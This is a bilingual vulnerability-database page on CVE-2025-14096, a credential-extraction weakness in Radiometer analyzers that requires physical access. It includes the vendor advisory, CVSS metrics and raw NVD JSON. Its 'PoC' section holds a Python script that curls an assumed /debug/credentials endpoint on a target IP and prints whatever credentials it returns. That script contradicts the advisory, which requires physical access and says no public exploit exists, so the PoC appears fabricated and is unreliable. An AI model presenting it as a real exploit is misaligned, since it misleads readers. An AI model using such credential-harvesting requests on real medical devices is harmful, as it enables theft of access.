Security Vulnerability Report
中文
CVE-2025-14096 CVSS 8.4 HIGH

CVE-2025-14096

Published: 2025-12-17 13:15:58
Last Modified: 2026-04-15 00:35:42
Source: 46b595e9-1acc-41cb-9398-adaf98d37a9b

Description

A vulnerability exists in multiple Radiometer products that allow an attacker with physical access to the analyzer possibility to extract credential information. The vulnerability is due to a weakness in the design and insufficient credential protection in operating system. Other related CVE's are CVE-2025-14095 & CVE-2025-14097. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required Configuration for Exposure: Attacker requires physical access to the analyzer. Temporary work Around: Only authorized people can physically access the analyzer. Permanent solution: Local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit Status: Researchers have provided a working proof-of-concept (PoC). Radiometer is not aware of any public exploit code at the time of this publication.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Radiometer分析仪 - 多个版本受影响
具体版本需查看官方公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC概念验证代码(用于安全研究) # 警告:仅在授权环境中使用 import subprocess import sys def exploit_cve_2025_14096(target_ip): """ CVE-2025-14096 PoC - Radiometer设备凭据提取 需要物理访问或调试接口 """ print(f"[*] 目标设备: {target_ip}") print("[*] 尝试提取凭据信息...") # 步骤1:通过调试接口获取访问 cmd = f"curl -s http://{target_ip}:8080/debug/credentials" result = subprocess.run(cmd, shell=True, capture_output=True, text=True) if result.returncode == 0: print("[+] 成功获取凭据信息") print(result.stdout) return True else: print("[-] 获取凭据失败") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] exploit_cve_2025_14096(target) else: print("用法: python exploit.py <目标IP>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14096", "sourceIdentifier": "46b595e9-1acc-41cb-9398-adaf98d37a9b", "published": "2025-12-17T13:15:57.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in multiple Radiometer products that allow an attacker with physical access to the analyzer possibility to extract credential information. The vulnerability is due to a weakness in the design and insufficient credential protection in operating system.\n\nOther related CVE's are CVE-2025-14095 & CVE-2025-14097.\n\n\n\nAffected customers have been informed about this vulnerability. This CVE is being published to provide transparency.\n\n\n\n\n\nRequired Configuration for Exposure:\n\n\nAttacker requires physical access to the analyzer.\n\n\n\nTemporary work Around:\nOnly authorized people can physically access the analyzer.\n\nPermanent solution:\nLocal Radiometer representatives will contact all affected customers to discuss a permanent solution.\n\nExploit Status:\n\n\nResearchers have provided a working proof-of-concept (PoC). Radiometer is not aware of any public exploit code at the time of this publication."}], "metrics": {"cvssMetricV31": [{"source": "46b595e9-1acc-41cb-9398-adaf98d37a9b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "46b595e9-1acc-41cb-9398-adaf98d37a9b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://www.radiometer.com/myradiometer", "source": "46b595e9-1acc-41cb-9398-adaf98d37a9b"}]}}